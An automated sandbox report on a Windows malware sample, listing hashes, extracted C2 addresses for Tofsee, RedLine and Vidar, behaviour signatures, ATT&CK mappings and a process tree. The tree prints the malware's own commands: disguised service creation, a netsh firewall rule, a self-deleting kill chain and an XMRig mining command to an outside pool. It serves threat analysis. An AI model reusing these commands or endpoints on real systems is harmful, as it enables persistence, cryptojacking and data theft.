Analysis

  • max time kernel
    150s
  • max time network
    144s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24-09-2022 14:39

General

  • Target

    0dcb665bf83e5de02dac89f4c72741b5330fa15bd8bb45508a756d9d6f5f3a72.exe

  • Size

    196KB

  • MD5

    4ea72ef5197e09f791cd631d52fc897b

  • SHA1

    16a03d022b4b40919e54952e8ad0f697ed69881e

  • SHA256

    0dcb665bf83e5de02dac89f4c72741b5330fa15bd8bb45508a756d9d6f5f3a72

  • SHA512

    f6755e88cdecd4e96b4dc2595ed67b9cc69a9ce319c203d55de14eedb032014e8e24ba2f193cf07958bbf43321b525c7fdd7c1e46cb5e1fe3b5543bc120578da

  • SSDEEP

    3072:tAq9LyJz0RGb5QkjvOk8Hsg+UIBLWu3utc/Pkk4x:hLm0nkj+Da3

Malware Config

Extracted

Family

tofsee

C2

svartalfheim.top

jotunheim.name

Extracted

Family

redline

Botnet

LogsDiller Cloud (TG: @me_golds)

C2

77.73.134.27:7161

Attributes
  • auth_value

    e136da06c7c0400f4091dab1787720ea

Extracted

Family

vidar

Version

54.6

Botnet

1684

C2

https://t.me/huobiinside

https://mas.to/@kyriazhs1975

Attributes
  • profile_id

    1684

Signatures

  • Detects Smokeloader packer 1 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 1 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 2 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 7 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Launches sc.exe 3 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies data under HKEY_USERS 7 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 19 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\0dcb665bf83e5de02dac89f4c72741b5330fa15bd8bb45508a756d9d6f5f3a72.exe
    "C:\Users\Admin\AppData\Local\Temp\0dcb665bf83e5de02dac89f4c72741b5330fa15bd8bb45508a756d9d6f5f3a72.exe"
    1⤵
    • Checks SCSI registry key(s)
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    PID:2424
  • C:\Users\Admin\AppData\Local\Temp\203.exe
    C:\Users\Admin\AppData\Local\Temp\203.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:400
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
      2⤵
        PID:100860
    • C:\Users\Admin\AppData\Local\Temp\521.exe
      C:\Users\Admin\AppData\Local\Temp\521.exe
      1⤵
      • Executes dropped EXE
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:23536
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\shyxsiln\
        2⤵
          PID:73512
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\zycawcdu.exe" C:\Windows\SysWOW64\shyxsiln\
          2⤵
            PID:98648
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\System32\sc.exe" create shyxsiln binPath= "C:\Windows\SysWOW64\shyxsiln\zycawcdu.exe /d\"C:\Users\Admin\AppData\Local\Temp\521.exe\"" type= own start= auto DisplayName= "wifi support"
            2⤵
            • Launches sc.exe
            PID:100948
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\System32\sc.exe" description shyxsiln "wifi internet conection"
            2⤵
            • Launches sc.exe
            PID:101028
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\System32\sc.exe" start shyxsiln
            2⤵
            • Launches sc.exe
            PID:101180
          • C:\Windows\SysWOW64\netsh.exe
            "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
            2⤵
            • Modifies Windows Firewall
            PID:101328
        • C:\Users\Admin\AppData\Local\Temp\D40.exe
          C:\Users\Admin\AppData\Local\Temp\D40.exe
          1⤵
          • Executes dropped EXE
          • Checks computer location settings
          • Loads dropped DLL
          • Checks processor information in registry
          • Suspicious use of WriteProcessMemory
          PID:100892
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" 116.203.7.175/c taskkill /im D40.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\D40.exe" & del C:\PrograData\*.dll & exit
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:4188
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im D40.exe /f
              3⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:3924
            • C:\Windows\SysWOW64\timeout.exe
              timeout /t 6
              3⤵
              • Delays execution with timeout.exe
              PID:3720
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 100892 -s 1940
            2⤵
            • Program crash
            PID:3564
        • C:\Users\Admin\AppData\Local\Temp\10DB.exe
          C:\Users\Admin\AppData\Local\Temp\10DB.exe
          1⤵
          • Executes dropped EXE
          PID:100992
        • C:\Users\Admin\AppData\Local\Temp\138C.exe
          C:\Users\Admin\AppData\Local\Temp\138C.exe
          1⤵
          • Executes dropped EXE
          PID:101152
        • C:\Windows\SysWOW64\shyxsiln\zycawcdu.exe
          C:\Windows\SysWOW64\shyxsiln\zycawcdu.exe /d"C:\Users\Admin\AppData\Local\Temp\521.exe"
          1⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious use of WriteProcessMemory
          PID:101292
          • C:\Windows\SysWOW64\svchost.exe
            svchost.exe
            2⤵
            • Sets service image path in registry
            • Drops file in System32 directory
            • Suspicious use of SetThreadContext
            • Modifies data under HKEY_USERS
            PID:98676
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe -o fastpool.xyz:10060 -u 9mLwUkiK8Yp89zQQYodWKN29jVVVz1cWDFZctWxge16Zi3TpHnSBnnVcCDhSRXdesnMBdVjtDwh1N71KD9z37EzgKSM1tmS.60000 -p x -k -a cn/half
              3⤵
                PID:3944
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 100892 -ip 100892
            1⤵
              PID:2180
            • C:\Users\Admin\AppData\Local\Temp\3388.exe
              C:\Users\Admin\AppData\Local\Temp\3388.exe
              1⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:2540
              • C:\Windows\SysWOW64\Wbem\wmic.exe
                wmic os get Caption
                2⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:1904
              • C:\Windows\SysWOW64\cmd.exe
                cmd /C "wmic path win32_VideoController get name"
                2⤵
                  PID:4840
                  • C:\Windows\SysWOW64\Wbem\WMIC.exe
                    wmic path win32_VideoController get name
                    3⤵
                      PID:2428
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /C "wmic cpu get name"
                    2⤵
                      PID:4672
                      • C:\Windows\SysWOW64\Wbem\WMIC.exe
                        wmic cpu get name
                        3⤵
                          PID:1412
                    • C:\Windows\SysWOW64\explorer.exe
                      C:\Windows\SysWOW64\explorer.exe
                      1⤵
                        PID:2204
                      • C:\Windows\explorer.exe
                        C:\Windows\explorer.exe
                        1⤵
                          PID:3416
                        • C:\Windows\SysWOW64\explorer.exe
                          C:\Windows\SysWOW64\explorer.exe
                          1⤵
                            PID:1156
                          • C:\Windows\explorer.exe
                            C:\Windows\explorer.exe
                            1⤵
                              PID:1368
                            • C:\Windows\SysWOW64\explorer.exe
                              C:\Windows\SysWOW64\explorer.exe
                              1⤵
                                PID:4776
                              • C:\Windows\SysWOW64\explorer.exe
                                C:\Windows\SysWOW64\explorer.exe
                                1⤵
                                  PID:3340
                                • C:\Windows\SysWOW64\explorer.exe
                                  C:\Windows\SysWOW64\explorer.exe
                                  1⤵
                                    PID:4304
                                  • C:\Windows\explorer.exe
                                    C:\Windows\explorer.exe
                                    1⤵
                                      PID:1804
                                    • C:\Windows\SysWOW64\explorer.exe
                                      C:\Windows\SysWOW64\explorer.exe
                                      1⤵
                                        PID:5092

                                      Network

                                      MITRE ATT&CK Matrix ATT&CK v6

                                      Persistence

                                      New Service

                                      1
                                      T1050

                                      Modify Existing Service

                                      1
                                      T1031

                                      Registry Run Keys / Startup Folder

                                      1
                                      T1060

                                      Privilege Escalation

                                      New Service

                                      1
                                      T1050

                                      Defense Evasion

                                      Modify Registry

                                      1
                                      T1112

                                      Credential Access

                                      Credentials in Files

                                      3
                                      T1081

                                      Discovery

                                      Query Registry

                                      4
                                      T1012

                                      System Information Discovery

                                      4
                                      T1082

                                      Peripheral Device Discovery

                                      1
                                      T1120

                                      Collection

                                      Data from Local System

                                      3
                                      T1005

                                      Replay Monitor

                                      Loading Replay Monitor...

                                      Downloads

                                      • C:\ProgramData\mozglue.dll
                                        Filesize

                                        593KB

                                        MD5

                                        c8fd9be83bc728cc04beffafc2907fe9

                                        SHA1

                                        95ab9f701e0024cedfbd312bcfe4e726744c4f2e

                                        SHA256

                                        ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

                                        SHA512

                                        fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

                                      • C:\ProgramData\nss3.dll
                                        Filesize

                                        2.0MB

                                        MD5

                                        1cc453cdf74f31e4d913ff9c10acdde2

                                        SHA1

                                        6e85eae544d6e965f15fa5c39700fa7202f3aafe

                                        SHA256

                                        ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

                                        SHA512

                                        dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

                                      • C:\Users\Admin\AppData\Local\Temp\10DB.exe
                                        Filesize

                                        318KB

                                        MD5

                                        3522115d8f6166600da74f8e1de0f3e2

                                        SHA1

                                        e585371494ba0b51e3ed360d836ed6e5bcf9eede

                                        SHA256

                                        bb320227ae1e380e84ebd2fd865f4e3af1bbb1d6222d55887dfac790f88aeccd

                                        SHA512

                                        dde8756262b837c831638e8287417aa11e7d085791ecc6f4382b5e6af728d57026dbf16dd51facd7edcae931a613c799df9cc7e3d965b99ed42bf2439d9bd1ad

                                      • C:\Users\Admin\AppData\Local\Temp\10DB.exe
                                        Filesize

                                        318KB

                                        MD5

                                        3522115d8f6166600da74f8e1de0f3e2

                                        SHA1

                                        e585371494ba0b51e3ed360d836ed6e5bcf9eede

                                        SHA256

                                        bb320227ae1e380e84ebd2fd865f4e3af1bbb1d6222d55887dfac790f88aeccd

                                        SHA512

                                        dde8756262b837c831638e8287417aa11e7d085791ecc6f4382b5e6af728d57026dbf16dd51facd7edcae931a613c799df9cc7e3d965b99ed42bf2439d9bd1ad

                                      • C:\Users\Admin\AppData\Local\Temp\138C.exe
                                        Filesize

                                        365KB

                                        MD5

                                        4b3420fde73c8ff72112e6d77aad355f

                                        SHA1

                                        9e8ec0cef4e2ba3b7ee245967defd23104f4cd41

                                        SHA256

                                        7dccf0c0d5215a5bcacd17f7b8e57ee36733d962e8430b6b5e135d4ea96f51e1

                                        SHA512

                                        eae274413beaaa08f474128c5c06372eb6363453b6923cecab127fc7f1836820e3054b450a2daf975e5877049391aea5d4cae05f93d5b1658241ced2d7b7ef51

                                      • C:\Users\Admin\AppData\Local\Temp\138C.exe
                                        Filesize

                                        365KB

                                        MD5

                                        4b3420fde73c8ff72112e6d77aad355f

                                        SHA1

                                        9e8ec0cef4e2ba3b7ee245967defd23104f4cd41

                                        SHA256

                                        7dccf0c0d5215a5bcacd17f7b8e57ee36733d962e8430b6b5e135d4ea96f51e1

                                        SHA512

                                        eae274413beaaa08f474128c5c06372eb6363453b6923cecab127fc7f1836820e3054b450a2daf975e5877049391aea5d4cae05f93d5b1658241ced2d7b7ef51

                                      • C:\Users\Admin\AppData\Local\Temp\203.exe
                                        Filesize

                                        2.6MB

                                        MD5

                                        ea6fee4ce432602e3dd2b849f8396027

                                        SHA1

                                        5151b46012f637fe7fdbda551be1651009eb453a

                                        SHA256

                                        b44181d7365ab6868e1cf0d7127a56862075944099f6f1f965b11f41c78fd75d

                                        SHA512

                                        b567449c006248a4311a1a3325279e2d4edfacacb272ae3152b085d3164e722370aa748cbaa3299425ede1e4910218988e88f24de744944903b2001b70e263be

                                      • C:\Users\Admin\AppData\Local\Temp\203.exe
                                        Filesize

                                        2.6MB

                                        MD5

                                        ea6fee4ce432602e3dd2b849f8396027

                                        SHA1

                                        5151b46012f637fe7fdbda551be1651009eb453a

                                        SHA256

                                        b44181d7365ab6868e1cf0d7127a56862075944099f6f1f965b11f41c78fd75d

                                        SHA512

                                        b567449c006248a4311a1a3325279e2d4edfacacb272ae3152b085d3164e722370aa748cbaa3299425ede1e4910218988e88f24de744944903b2001b70e263be

                                      • C:\Users\Admin\AppData\Local\Temp\3388.exe
                                        Filesize

                                        7.8MB

                                        MD5

                                        a06e0220c0b45edee4f517b9e61edc57

                                        SHA1

                                        691fc36f0d53e7870104e440f8e7498f54037eef

                                        SHA256

                                        03de028fc96401cd4582865dd5313d7edb62b647eeef9aafbe129aa5a58ab44d

                                        SHA512

                                        bccd87ad4103584eade90f0735d1e7d9e5ab3c2075144a1de0015f5dea207d5729b8e885ccff998f09016ae3b2594cda4799d011f4b96323809cba7e36143c65

                                      • C:\Users\Admin\AppData\Local\Temp\3388.exe
                                        Filesize

                                        7.8MB

                                        MD5

                                        a06e0220c0b45edee4f517b9e61edc57

                                        SHA1

                                        691fc36f0d53e7870104e440f8e7498f54037eef

                                        SHA256

                                        03de028fc96401cd4582865dd5313d7edb62b647eeef9aafbe129aa5a58ab44d

                                        SHA512

                                        bccd87ad4103584eade90f0735d1e7d9e5ab3c2075144a1de0015f5dea207d5729b8e885ccff998f09016ae3b2594cda4799d011f4b96323809cba7e36143c65

                                      • C:\Users\Admin\AppData\Local\Temp\521.exe
                                        Filesize

                                        197KB

                                        MD5

                                        805daf89461f2abf32affa17c008e9fa

                                        SHA1

                                        a78e3c2a8076dc720796d68d4f67987436a36b4f

                                        SHA256

                                        38a1688c1813ec2bb20f262314fe2936b07d09f2c785e609be99c28d7e275588

                                        SHA512

                                        b6c4bb22068287b03002bad5cadb7b8e9de06c8416b4ad2152909eef07e8539cc0630a0937bf7a9c4f1142cb4922fab5fe3285b902b3cb9a4c8f64b4f6a6d0d7

                                      • C:\Users\Admin\AppData\Local\Temp\521.exe
                                        Filesize

                                        197KB

                                        MD5

                                        805daf89461f2abf32affa17c008e9fa

                                        SHA1

                                        a78e3c2a8076dc720796d68d4f67987436a36b4f

                                        SHA256

                                        38a1688c1813ec2bb20f262314fe2936b07d09f2c785e609be99c28d7e275588

                                        SHA512

                                        b6c4bb22068287b03002bad5cadb7b8e9de06c8416b4ad2152909eef07e8539cc0630a0937bf7a9c4f1142cb4922fab5fe3285b902b3cb9a4c8f64b4f6a6d0d7

                                      • C:\Users\Admin\AppData\Local\Temp\D40.exe
                                        Filesize

                                        296KB

                                        MD5

                                        8565ffd9927d710197ffc41000835124

                                        SHA1

                                        7c908987eca2c76ee44cca8f3730c3e3936e0d0c

                                        SHA256

                                        a2f6d565d70e1c41bcfdd6c763f237dda3252d2c207012f77f58d3c5dc6a5a4a

                                        SHA512

                                        62d94d2d06c53006826e6a7574ab62f5c4cf8c84a96f00474fc2b184368f1e4f7b4027236d8325c615f508734bfc8d52f690f6ea9bc17375726489260d69a5f5

                                      • C:\Users\Admin\AppData\Local\Temp\D40.exe
                                        Filesize

                                        296KB

                                        MD5

                                        8565ffd9927d710197ffc41000835124

                                        SHA1

                                        7c908987eca2c76ee44cca8f3730c3e3936e0d0c

                                        SHA256

                                        a2f6d565d70e1c41bcfdd6c763f237dda3252d2c207012f77f58d3c5dc6a5a4a

                                        SHA512

                                        62d94d2d06c53006826e6a7574ab62f5c4cf8c84a96f00474fc2b184368f1e4f7b4027236d8325c615f508734bfc8d52f690f6ea9bc17375726489260d69a5f5

                                      • C:\Users\Admin\AppData\Local\Temp\zycawcdu.exe
                                        Filesize

                                        13.5MB

                                        MD5

                                        3197bb3bdd0e0b02c5b7288663e03ebe

                                        SHA1

                                        555017bf45bc1efc714562872d65e2a2d47d419c

                                        SHA256

                                        ed4b211d6f02a3ce72e2bd78e5ed843773ffed30e63ed05e79878485fade2a45

                                        SHA512

                                        f0a7ce2bbcef72e4c601dc8e3e338464a77b1eba515a0b4ce29195e8d1a08d51c1d2214035f0d904b6cae7ae1bf583da26f7fe7b2c1727da8667991e8b5ff9f9

                                      • C:\Windows\SysWOW64\shyxsiln\zycawcdu.exe
                                        Filesize

                                        13.5MB

                                        MD5

                                        3197bb3bdd0e0b02c5b7288663e03ebe

                                        SHA1

                                        555017bf45bc1efc714562872d65e2a2d47d419c

                                        SHA256

                                        ed4b211d6f02a3ce72e2bd78e5ed843773ffed30e63ed05e79878485fade2a45

                                        SHA512

                                        f0a7ce2bbcef72e4c601dc8e3e338464a77b1eba515a0b4ce29195e8d1a08d51c1d2214035f0d904b6cae7ae1bf583da26f7fe7b2c1727da8667991e8b5ff9f9

                                      • memory/400-136-0x0000000000000000-mapping.dmp
                                      • memory/1156-231-0x0000000001060000-0x0000000001069000-memory.dmp
                                        Filesize

                                        36KB

                                      • memory/1156-230-0x0000000001070000-0x0000000001075000-memory.dmp
                                        Filesize

                                        20KB

                                      • memory/1156-227-0x0000000000000000-mapping.dmp
                                      • memory/1156-280-0x0000000001070000-0x0000000001075000-memory.dmp
                                        Filesize

                                        20KB

                                      • memory/1368-233-0x0000000000560000-0x0000000000566000-memory.dmp
                                        Filesize

                                        24KB

                                      • memory/1368-234-0x0000000000550000-0x000000000055C000-memory.dmp
                                        Filesize

                                        48KB

                                      • memory/1368-281-0x0000000000560000-0x0000000000566000-memory.dmp
                                        Filesize

                                        24KB

                                      • memory/1368-232-0x0000000000000000-mapping.dmp
                                      • memory/1412-229-0x0000000000000000-mapping.dmp
                                      • memory/1804-284-0x0000000000B50000-0x0000000000B57000-memory.dmp
                                        Filesize

                                        28KB

                                      • memory/1804-272-0x0000000000000000-mapping.dmp
                                      • memory/1804-273-0x0000000000B50000-0x0000000000B57000-memory.dmp
                                        Filesize

                                        28KB

                                      • memory/1804-274-0x0000000000B40000-0x0000000000B4D000-memory.dmp
                                        Filesize

                                        52KB

                                      • memory/1904-222-0x0000000000000000-mapping.dmp
                                      • memory/2204-278-0x0000000001100000-0x0000000001107000-memory.dmp
                                        Filesize

                                        28KB

                                      • memory/2204-220-0x00000000010F0000-0x00000000010FB000-memory.dmp
                                        Filesize

                                        44KB

                                      • memory/2204-218-0x0000000000000000-mapping.dmp
                                      • memory/2204-219-0x0000000001100000-0x0000000001107000-memory.dmp
                                        Filesize

                                        28KB

                                      • memory/2424-132-0x00000000006F8000-0x0000000000709000-memory.dmp
                                        Filesize

                                        68KB

                                      • memory/2424-133-0x00000000022C0000-0x00000000022C9000-memory.dmp
                                        Filesize

                                        36KB

                                      • memory/2424-134-0x0000000000400000-0x000000000058B000-memory.dmp
                                        Filesize

                                        1.5MB

                                      • memory/2424-135-0x0000000000400000-0x000000000058B000-memory.dmp
                                        Filesize

                                        1.5MB

                                      • memory/2428-226-0x0000000000000000-mapping.dmp
                                      • memory/2540-215-0x0000000000000000-mapping.dmp
                                      • memory/3340-242-0x0000000000170000-0x0000000000175000-memory.dmp
                                        Filesize

                                        20KB

                                      • memory/3340-243-0x0000000000160000-0x0000000000169000-memory.dmp
                                        Filesize

                                        36KB

                                      • memory/3340-241-0x0000000000000000-mapping.dmp
                                      • memory/3416-221-0x0000000000000000-mapping.dmp
                                      • memory/3416-223-0x0000000000CF0000-0x0000000000CF9000-memory.dmp
                                        Filesize

                                        36KB

                                      • memory/3416-224-0x0000000000CE0000-0x0000000000CEF000-memory.dmp
                                        Filesize

                                        60KB

                                      • memory/3416-279-0x0000000000CF0000-0x0000000000CF9000-memory.dmp
                                        Filesize

                                        36KB

                                      • memory/3720-207-0x0000000000000000-mapping.dmp
                                      • memory/3924-206-0x0000000000000000-mapping.dmp
                                      • memory/3944-269-0x0000000000700000-0x00000000007F1000-memory.dmp
                                        Filesize

                                        964KB

                                      • memory/3944-264-0x0000000000700000-0x00000000007F1000-memory.dmp
                                        Filesize

                                        964KB

                                      • memory/3944-263-0x0000000000000000-mapping.dmp
                                      • memory/4188-205-0x0000000000000000-mapping.dmp
                                      • memory/4304-283-0x0000000000C00000-0x0000000000C06000-memory.dmp
                                        Filesize

                                        24KB

                                      • memory/4304-262-0x0000000000000000-mapping.dmp
                                      • memory/4304-271-0x00000000009F0000-0x00000000009FB000-memory.dmp
                                        Filesize

                                        44KB

                                      • memory/4304-270-0x0000000000C00000-0x0000000000C06000-memory.dmp
                                        Filesize

                                        24KB

                                      • memory/4672-228-0x0000000000000000-mapping.dmp
                                      • memory/4776-282-0x0000000000920000-0x0000000000942000-memory.dmp
                                        Filesize

                                        136KB

                                      • memory/4776-235-0x0000000000000000-mapping.dmp
                                      • memory/4776-238-0x0000000000920000-0x0000000000942000-memory.dmp
                                        Filesize

                                        136KB

                                      • memory/4776-239-0x00000000008F0000-0x0000000000917000-memory.dmp
                                        Filesize

                                        156KB

                                      • memory/4840-225-0x0000000000000000-mapping.dmp
                                      • memory/5092-285-0x0000000000900000-0x0000000000908000-memory.dmp
                                        Filesize

                                        32KB

                                      • memory/5092-276-0x0000000000900000-0x0000000000908000-memory.dmp
                                        Filesize

                                        32KB

                                      • memory/5092-277-0x00000000008F0000-0x00000000008FB000-memory.dmp
                                        Filesize

                                        44KB

                                      • memory/5092-275-0x0000000000000000-mapping.dmp
                                      • memory/23536-143-0x0000000000620000-0x0000000000633000-memory.dmp
                                        Filesize

                                        76KB

                                      • memory/23536-145-0x0000000000400000-0x000000000058B000-memory.dmp
                                        Filesize

                                        1.5MB

                                      • memory/23536-176-0x0000000000620000-0x0000000000633000-memory.dmp
                                        Filesize

                                        76KB

                                      • memory/23536-177-0x0000000000400000-0x000000000058B000-memory.dmp
                                        Filesize

                                        1.5MB

                                      • memory/23536-139-0x0000000000000000-mapping.dmp
                                      • memory/23536-175-0x0000000000699000-0x00000000006AA000-memory.dmp
                                        Filesize

                                        68KB

                                      • memory/23536-142-0x0000000000699000-0x00000000006AA000-memory.dmp
                                        Filesize

                                        68KB

                                      • memory/73512-144-0x0000000000000000-mapping.dmp
                                      • memory/98648-146-0x0000000000000000-mapping.dmp
                                      • memory/98676-179-0x0000000000F70000-0x0000000000F85000-memory.dmp
                                        Filesize

                                        84KB

                                      • memory/98676-247-0x00000000025E0000-0x00000000025E6000-memory.dmp
                                        Filesize

                                        24KB

                                      • memory/98676-259-0x00000000031E0000-0x00000000031E7000-memory.dmp
                                        Filesize

                                        28KB

                                      • memory/98676-250-0x00000000025F0000-0x0000000002600000-memory.dmp
                                        Filesize

                                        64KB

                                      • memory/98676-244-0x0000000002E00000-0x000000000300F000-memory.dmp
                                        Filesize

                                        2.1MB

                                      • memory/98676-237-0x0000000000F70000-0x0000000000F85000-memory.dmp
                                        Filesize

                                        84KB

                                      • memory/98676-253-0x00000000031D0000-0x00000000031D5000-memory.dmp
                                        Filesize

                                        20KB

                                      • memory/98676-256-0x0000000007D00000-0x000000000810B000-memory.dmp
                                        Filesize

                                        4.0MB

                                      • memory/98676-184-0x0000000000F70000-0x0000000000F85000-memory.dmp
                                        Filesize

                                        84KB

                                      • memory/98676-178-0x0000000000000000-mapping.dmp
                                      • memory/100860-164-0x0000000005580000-0x0000000005592000-memory.dmp
                                        Filesize

                                        72KB

                                      • memory/100860-148-0x0000000000000000-mapping.dmp
                                      • memory/100860-236-0x00000000068C0000-0x0000000006A82000-memory.dmp
                                        Filesize

                                        1.8MB

                                      • memory/100860-214-0x00000000078C0000-0x0000000007910000-memory.dmp
                                        Filesize

                                        320KB

                                      • memory/100860-213-0x0000000007940000-0x00000000079B6000-memory.dmp
                                        Filesize

                                        472KB

                                      • memory/100860-212-0x0000000006AF0000-0x0000000007094000-memory.dmp
                                        Filesize

                                        5.6MB

                                      • memory/100860-211-0x00000000064A0000-0x0000000006532000-memory.dmp
                                        Filesize

                                        584KB

                                      • memory/100860-210-0x0000000005940000-0x00000000059A6000-memory.dmp
                                        Filesize

                                        408KB

                                      • memory/100860-161-0x0000000005AD0000-0x00000000060E8000-memory.dmp
                                        Filesize

                                        6.1MB

                                      • memory/100860-163-0x0000000005650000-0x000000000575A000-memory.dmp
                                        Filesize

                                        1.0MB

                                      • memory/100860-240-0x0000000007EF0000-0x000000000841C000-memory.dmp
                                        Filesize

                                        5.2MB

                                      • memory/100860-169-0x00000000055E0000-0x000000000561C000-memory.dmp
                                        Filesize

                                        240KB

                                      • memory/100860-149-0x0000000000400000-0x0000000000428000-memory.dmp
                                        Filesize

                                        160KB

                                      • memory/100892-153-0x0000000000000000-mapping.dmp
                                      • memory/100892-171-0x0000000000400000-0x00000000005A4000-memory.dmp
                                        Filesize

                                        1.6MB

                                      • memory/100892-170-0x00000000021E0000-0x0000000002227000-memory.dmp
                                        Filesize

                                        284KB

                                      • memory/100892-168-0x00000000005D9000-0x0000000000602000-memory.dmp
                                        Filesize

                                        164KB

                                      • memory/100892-185-0x0000000061E00000-0x0000000061EF3000-memory.dmp
                                        Filesize

                                        972KB

                                      • memory/100892-208-0x00000000005D9000-0x0000000000602000-memory.dmp
                                        Filesize

                                        164KB

                                      • memory/100892-209-0x0000000000400000-0x00000000005A4000-memory.dmp
                                        Filesize

                                        1.6MB

                                      • memory/100948-157-0x0000000000000000-mapping.dmp
                                      • memory/100992-158-0x0000000000000000-mapping.dmp
                                      • memory/101028-160-0x0000000000000000-mapping.dmp
                                      • memory/101152-165-0x0000000000000000-mapping.dmp
                                      • memory/101180-167-0x0000000000000000-mapping.dmp
                                      • memory/101292-182-0x0000000000822000-0x0000000000833000-memory.dmp
                                        Filesize

                                        68KB

                                      • memory/101292-183-0x0000000000400000-0x000000000058B000-memory.dmp
                                        Filesize

                                        1.5MB

                                      • memory/101328-174-0x0000000000000000-mapping.dmp